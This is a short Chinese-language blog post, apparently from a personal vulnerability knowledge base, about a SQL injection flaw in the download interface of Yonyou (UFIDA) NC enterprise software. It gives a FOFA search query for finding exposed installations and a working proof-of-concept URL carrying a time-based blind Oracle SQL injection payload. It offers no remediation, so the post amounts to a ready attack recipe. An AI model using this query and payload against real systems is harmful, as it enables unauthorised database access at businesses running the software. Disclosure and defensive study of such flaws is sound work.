Ninja's blog
  • 首页
  • 归档
  • 分类
  • 标签
  • 友链
  • 关于
  • 漏洞知识库
  • 在线工具
    Hack.chat私密频道 Linux命令大全 XSS平台
1970年1月1日 早上
47 字 1 分钟 次

用友NC接口download存在SQL注入漏洞

本文最后更新于 2024年8月27日 上午

用友NC接口download存在SQL注入漏洞

fofa

1
app="用友-UFIDA-NC"

poc

1
http://ip/portal/pt/psnImage/download?pageId=login&pk_psndoc=1%27)%20AND%206322=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(79)||CHR(66)||CHR(101),5)%20AND%20(%27rASZ%27=%27rASZ

漏洞知识库
用友NC接口saveXmlToFIleServlet存在文件上传 上一篇
用友NC的download文件存在任意文件读取漏洞 下一篇

目录

搜索

Hexo Fluid
总访问量 次 总访客数 人